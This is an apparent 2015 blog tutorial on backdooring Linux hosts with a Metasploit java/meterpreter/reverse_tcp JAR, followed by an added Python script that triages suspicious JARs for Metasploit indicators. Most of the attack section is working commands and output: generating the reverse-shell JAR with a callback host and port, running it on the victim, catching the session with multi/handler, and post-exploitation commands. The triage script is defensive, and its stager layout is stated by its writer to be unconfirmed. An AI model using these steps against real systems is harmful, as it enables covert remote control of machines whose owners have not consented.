Saturday, February 21, 2015

Compromising machines running Linux using Metasploit JAR Backdoors

Just as a Windows host can be backdoored with a malicious EXE generated by Metasploit, a host running Linux (or any OS with a Java runtime installed) can be backdoored with a Metasploit JAR payload. The JAR is not an exploit: it has to be executed by someone on the target, so it is delivered through social engineering, a writable deployment path, or an existing foothold, and it runs with the privileges of whoever launches it.

Creating the JAR backdoor with Metasploit's msfpayload to take over a Linux box. As the banner below warns, msfpayload was scheduled for removal in mid-2015; on a current Framework the same JAR comes from msfvenom (`-p java/meterpreter/reverse_tcp LHOST=... LPORT=... -f jar`). The `R` option asks for raw output, which for the Java payload is the JAR itself.
root@kali-praveend-attacker:~# msfpayload java/meterpreter/reverse_tcp LHOST=1.1.1.32 LPORT=8888 R > compromise.jar
[!] ************************************************************************
[!] *               The utility msfpayload is deprecated!                  *
[!] *              It will be removed on or about 2015-06-08               *
[!] *                   Please use msfvenom instead                        *
[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *
[!] ************************************************************************

Execute the JAR created above on the Linux box. Do this only after the handler in the next step is listening, otherwise the connect-back is refused and the process exits. `sudo` is not needed for the payload to run; it only makes the resulting session run as root (and it prompts for the user's password, which is a poor fit for a real delivery).
praveen@victim:/tmp$ sudo java -jar compromise.jar

On Kali, start a handler whose payload, LHOST and LPORT match the JAR, so that the victim has something to connect back to when the JAR is executed:
msf > use exploit/multi/handler
msf exploit(handler) > set payload java/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 1.1.1.32
LHOST => 1.1.1.32
msf exploit(handler) > set LPORT 8888
LPORT => 8888
msf exploit(handler) > show options
Module options (exploit/multi/handler):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Payload options (java/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  1.1.1.32         yes       The listen address
   LPORT  8888             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 1.1.1.32:8888
[*] Starting the payload handler...
[*] Sending stage (30355 bytes) to 1.1.1.40
[*] Meterpreter session 1 opened (1.1.1.32:8888 -> 1.1.1.40:33457) at 2015-02-15 17:49:04 -0500

Post-exploitation commands. Note that `sysinfo` reports the Meterpreter type as `java/java`: this is the Java Meterpreter, which runs inside the JVM process and does not offer the native-only features of the Linux x86/x64 Meterpreters (for example process migration and the extensions that depend on native code). Its privilege level is whatever the user who ran `java` had, root here only because of the `sudo`.
meterpreter > sysinfo
Computer    : victim
OS          : Linux 3.13.0-32-generic (amd64)
Meterpreter : java/java
meterpreter > pwd
/tmp

Creating a JAR from an arbitrary compiled class (here EvilMBean.class, from the author's rmx_remote working directory). Note that `jar cvf` writes a default manifest with no Main-Class entry, so `java -jar` refuses to run the result ("no main manifest attribute"); set the entry point with the `e` option (`jar cvfe compromise.jar EvilMBean EvilMBean.class`) or run the class via the classpath instead (`java -cp compromise.jar EvilMBean`).
root@kali-ucs:~/rmx_remote# jar cvf compromise.jar EvilMBean.class
added manifest
adding: EvilMBean.class(in = 172) (out= 134)(deflated 22%)
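As an added example (not code from the original post), here is a Python script that shows what the two kinds of JAR on this page look like from the other side, the way a responder would triage a JAR found in /tmp. It builds two constructed JARs in memory: one laid out the way I recall the msfvenom Java stager being laid out (manifest Main-Class `metasploit.Payload`, a `metasploit/Payload.class` entry and a `metasploit.dat` properties file carrying LHOST/LPORT; confirm against a real sample before relying on those names), and one built the way the `jar cvf` command above builds it, with a default manifest and no Main-Class. It then reports the entry point, the Metasploit indicators and the connect-back address. The class bytes and property values are constructed stand-ins, and the LHOST/LPORT values are the ones used in this post.

```python
"""Triage a JAR the way a responder would one found in /tmp after an incident.

Added example, not part of the original post. The layout of the 'stager'
JAR below (Main-Class metasploit.Payload, metasploit/Payload.class,
metasploit.dat with LHOST/LPORT) is what I recall msfvenom's Java stager
looks like; confirm against a real sample before relying on it.
"""
import io
import zipfile

# Constructed stand-in for a compiled class (real .class files start with 0xCAFEBABE).
FAKE_CLASS = b"\xca\xfe\xba\xbe" + b"\x00" * 28

# Entry names that have no business in a JAR on a production host.
SUSPECT_ENTRIES = {"metasploit/Payload.class", "metasploit.dat"}


def build_jar(manifest: str, entries: dict) -> bytes:
    """Write a JAR (a zip archive with META-INF/MANIFEST.MF) to memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", manifest)
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def parse_manifest(text: str) -> dict:
    """Parse 'Name: value' manifest attributes, joining continuation lines (leading space)."""
    attrs, last = {}, None
    for line in text.splitlines():
        if line.startswith(" ") and last:        # continuation of the previous attribute
            attrs[last] += line[1:]
        elif ":" in line:
            key, value = line.split(":", 1)
            last = key.strip()
            attrs[last] = value.strip()
    return attrs


def parse_properties(text: str) -> dict:
    """Parse a minimal Java .properties file (key=value lines, '#' comments)."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            props[key.strip()] = value.strip()
    return props


def triage_jar(data: bytes) -> dict:
    """Report the entry point, Metasploit indicators and the connect-back address, if any."""
    report = {"main_class": None, "runnable": False, "indicators": [], "callback": None}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if "META-INF/MANIFEST.MF" in names:
            attrs = parse_manifest(zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace"))
            report["main_class"] = attrs.get("Main-Class")
            # `java -jar` refuses a JAR whose manifest has no Main-Class.
            report["runnable"] = report["main_class"] is not None
        for name in names:
            if name in SUSPECT_ENTRIES or name.startswith("metasploit/"):
                report["indicators"].append(name)
        if "metasploit.dat" in names:
            props = parse_properties(zf.read("metasploit.dat").decode("utf-8", "replace"))
            if "LHOST" in props and "LPORT" in props:
                report["callback"] = (props["LHOST"], int(props["LPORT"]))
    return report


def is_msf_java_stager(report: dict) -> bool:
    """Flag a JAR whose entry point or entries match the assumed stager layout."""
    return report["main_class"] == "metasploit.Payload" or bool(report["indicators"])


# Constructed sample 1: shaped like the java/meterpreter/reverse_tcp JAR from this post.
STAGER_JAR = build_jar(
    "Manifest-Version: 1.0\r\nMain-Class: metasploit.Payload\r\n\r\n",
    {
        "metasploit/Payload.class": FAKE_CLASS,
        "metasploit.dat": "Spawn=2\nLHOST=1.1.1.32\nLPORT=8888\n",  # LHOST/LPORT as in the post
    },
)

# Constructed sample 2: what `jar cvf compromise.jar EvilMBean.class` produces (no Main-Class).
CLASS_ONLY_JAR = build_jar(
    "Manifest-Version: 1.0\r\nCreated-By: 1.7.0_75 (Oracle Corporation)\r\n\r\n",
    {"EvilMBean.class": FAKE_CLASS},
)

if __name__ == "__main__":
    for label, jar in (("stager", STAGER_JAR), ("class-only", CLASS_ONLY_JAR)):
        r = triage_jar(jar)
        print(f"{label}: {r}  msf_stager={is_msf_java_stager(r)}")
```

Run against a real file with `triage_jar(open(path, "rb").read())`. The callback tuple is the address the handler on the page listens on, which is what you would pivot to in firewall and proxy logs; the `runnable` flag explains why a `jar cvf` archive with no Main-Class dies under `java -jar` while the msfvenom JAR starts.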

